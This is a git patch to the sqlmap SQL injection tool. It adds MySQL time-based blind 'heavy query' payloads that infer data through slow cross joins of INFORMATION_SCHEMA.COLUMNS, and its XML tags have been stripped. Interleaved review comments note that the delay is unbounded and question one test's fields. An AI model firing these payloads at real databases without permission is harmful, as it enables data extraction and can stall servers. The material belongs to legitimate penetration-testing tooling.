From 4cc6afe0fc4e5f02d9e8725022d487ae1684e80d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 16 Nov 2021 23:27:22 +0100 Subject: [PATCH] Adding proper heavy query payload for MySQL --- data/xml/payloads/time_blind.xml | 102 +++++++++++++++++++++++++++++++ lib/core/settings.py | 2 +- 2 files changed, 103 insertions(+), 1 deletion(-) diff --git a/data/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml index daaa94d1f..dfd9a2d26 100644 --- a/data/xml/payloads/time_blind.xml +++ b/data/xml/payloads/time_blind.xml @@ -188,6 +188,26 @@ + + MySQL > 5.0.12 AND time-based blind (heavy query) + 5 + 3 + 2 + 1,2,3,8,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C) + + + + +
+ MySQL + > 5.0.12 +
+
+ MySQL < 5.0.12 OR time-based blind (BENCHMARK) 5 @@ -208,6 +228,26 @@ + + MySQL > 5.0.12 OR time-based blind (heavy query) + 5 + 3 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C) + + + + +
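Review bot: The new heavy-query vector has no bounded runtime: none of the added vectors reference a sleep-time placeholder, so the delay is whatever the cross join of three copies of INFORMATION_SCHEMA.COLUMNS takes, which grows with the cube of that table's row count and can hold a connection for minutes on a large schema. That behaviour is what justifies the risk value in this test, but nothing in the file says so, and a future maintainer may try to "tune" the delay as with the SLEEP and BENCHMARK variants. Suggest an XML comment above the test, e.g. `<!-- heavy query: delay scales with |INFORMATION_SCHEMA.COLUMNS|^3 and is not bounded by the configured sleep time -->`. The same applies to the OR and "- comment" variants added in the three following hunks of this file.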
+ MySQL + > 5.0.12 +
+
+ MySQL < 5.0.12 AND time-based blind (BENCHMARK - comment) 5 @@ -229,6 +269,27 @@ + + MySQL > 5.0.12 AND time-based blind (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM]) + + AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C) + # + + + + +
+ MySQL + > 5.0.12 +
+
+ MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment) 5 @@ -250,6 +311,27 @@ + + MySQL > 5.0.12 OR time-based blind (heavy query - comment) + 5 + 5 + 3 + 1,2,3,9 + 1 + OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM]) + + OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C) + # + + + + +
+ MySQL + > 5.0.12 +
+
+ MySQL >= 5.0.12 RLIKE time-based blind 5 @@ -1519,6 +1601,26 @@ + + MySQL > 5.0.12 time-based blind - Parameter replace (heavy query - comment) + 5 + 5 + 2 + 1,2,3,9 + 1 + IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C),[RANDNUM]) + + (SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C) + + + + +
+ MySQL + > 5.0.12 +
+
+ MySQL time-based blind - Parameter replace (bool) 5 diff --git a/lib/core/settings.py b/lib/core/settings.py index 809cb5d53..1dda2ac89 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -20,7 +20,7 @@ from thirdparty import six from thirdparty.six import unichr as _unichr # sqlmap version (...) -VERSION = "1.5.11.6" +VERSION = "1.5.11.7" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
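Review bot: The parameter-replace test is titled "(heavy query - comment)" but, as far as the stripped markup shows, neither its payload nor a trailing `#` comment element appears in this hunk, unlike the two "- comment" tests added earlier in this commit which do carry `#`; either the title or the test body looks inconsistent. The value following the clause list also appears to be `1`, whereas the sibling parameter-replace tests in this file are presumably declared with the replace variant of that field — if the element is indeed `<where>`, verify that `1` is intended here. Tag names are inferred from the surrounding file layout, so please confirm against the actual XML.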